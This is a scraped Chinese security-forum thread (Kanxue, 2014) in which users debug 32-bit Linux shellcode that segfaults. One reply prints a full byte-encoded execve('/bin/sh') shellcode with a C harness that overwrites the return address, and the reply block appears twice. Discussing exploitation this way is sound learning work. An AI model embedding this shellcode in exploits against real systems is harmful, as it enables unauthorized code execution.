[求助][求助]shellcode遇到的栈段执行问题-茶余饭后-看雪-安全社区|安全招聘|kanxue.com

最新回复 (5)
LeavesBNW 雪币： 29 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 31 粉丝 0 关注私信	LeavesBNW 1 2 楼这个shellcode是有问题的，你肯定是采用了下面的这种模式： jmp short GoToCall shellcode: pop esi ........ <shellcode meat> ......... GoToCall: call shellcode db '/bin/sh' 建议你把字符串"/bin/sh"放到栈中，用寄存器存储字符串的地址。我一般都是这么写。 2014-1-5 20:43 0
张jialin 雪币： 90 活跃值： (92) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 117 粉丝 2 关注私信	张jialin 1 3 楼我刚刚还在看你写的那个栈溢出漏洞利用原理，刚在我的电脑上实现了你的那个栈溢出利用，回来看我的求助贴，发现第一个解答就是你的。。。嗯，我的shellcode就是这么写的。把“/bin/sh”放到栈中是什么意思？能否详细说明一下。最好能有程序代码说明。感谢。 2014-1-5 20:54 0
KooJiSung 雪币： 357 活跃值： (3403) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 682 粉丝 3 关注私信	KooJiSung 4 楼 ..... 2014-1-5 21:03 0
LeavesBNW 雪币： 29 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 31 粉丝 0 关注私信	LeavesBNW 1 5 楼你看看这个我写的shellcode，参考了国外一些人的思路，代码如下： char shellcode[] = "\x31\xc0" /* xor %eax,%eax / "\x50" / push %eax / "\x68\x2f\x73\x68\x00" / push $0x0068732f(/sh) / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f (/bin)/ "\x89\xe3" / mov %esp,%ebx / "\x50" / push %eax / "\x53" / push %ebx / "\x31\xd2" /xorl %edx,%edx / "\x89\xe1" /mov %esp,%ecx / "\xb0\x0b" / mov $0xb,%al / "\xcd\x80"; / int $0x80 / void main() { int ret; ret = (int) &ret + 2; (ret) = (int) shellcode; } 2014-1-5 21:18 0
张jialin 雪币： 90 活跃值： (92) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 117 粉丝 2 关注私信	张jialin 1 6 楼我参考你的shellcode后面的代码写了一个汇编程序，成功得到shell，从gdb中导出了shellcode的opcode码，和你的比较了一下，完全是一样的。于是有了下面这个程序（就是和你那个一样的）但是执行后仍旧是segmentation fault，gdb调试如下。我感觉我跟shellcode一定有仇。。。。上传的附件：代码.png （4.54kb，1次下载）崩溃.png （10.54kb，1次下载） 2014-1-5 23:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (5)
LeavesBNW 雪币： 29 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 31 粉丝 0 关注私信	LeavesBNW 1 2 楼这个shellcode是有问题的，你肯定是采用了下面的这种模式： jmp short GoToCall shellcode: pop esi ........ <shellcode meat> ......... GoToCall: call shellcode db '/bin/sh' 建议你把字符串"/bin/sh"放到栈中，用寄存器存储字符串的地址。我一般都是这么写。 2014-1-5 20:43 0
张jialin 雪币： 90 活跃值： (92) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 117 粉丝 2 关注私信	张jialin 1 3 楼我刚刚还在看你写的那个栈溢出漏洞利用原理，刚在我的电脑上实现了你的那个栈溢出利用，回来看我的求助贴，发现第一个解答就是你的。。。嗯，我的shellcode就是这么写的。把“/bin/sh”放到栈中是什么意思？能否详细说明一下。最好能有程序代码说明。感谢。 2014-1-5 20:54 0
KooJiSung 雪币： 357 活跃值： (3403) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 682 粉丝 3 关注私信	KooJiSung 4 楼 ..... 2014-1-5 21:03 0
LeavesBNW 雪币： 29 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 31 粉丝 0 关注私信	LeavesBNW 1 5 楼你看看这个我写的shellcode，参考了国外一些人的思路，代码如下： char shellcode[] = "\x31\xc0" /* xor %eax,%eax / "\x50" / push %eax / "\x68\x2f\x73\x68\x00" / push $0x0068732f(/sh) / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f (/bin)/ "\x89\xe3" / mov %esp,%ebx / "\x50" / push %eax / "\x53" / push %ebx / "\x31\xd2" /xorl %edx,%edx / "\x89\xe1" /mov %esp,%ecx / "\xb0\x0b" / mov $0xb,%al / "\xcd\x80"; / int $0x80 / void main() { int ret; ret = (int) &ret + 2; (ret) = (int) shellcode; } 2014-1-5 21:18 0
张jialin 雪币： 90 活跃值： (92) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 117 粉丝 2 关注私信	张jialin 1 6 楼我参考你的shellcode后面的代码写了一个汇编程序，成功得到shell，从gdb中导出了shellcode的opcode码，和你的比较了一下，完全是一样的。于是有了下面这个程序（就是和你那个一样的）但是执行后仍旧是segmentation fault，gdb调试如下。我感觉我跟shellcode一定有仇。。。。上传的附件：代码.png （4.54kb，1次下载）崩溃.png （10.54kb，1次下载） 2014-1-5 23:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复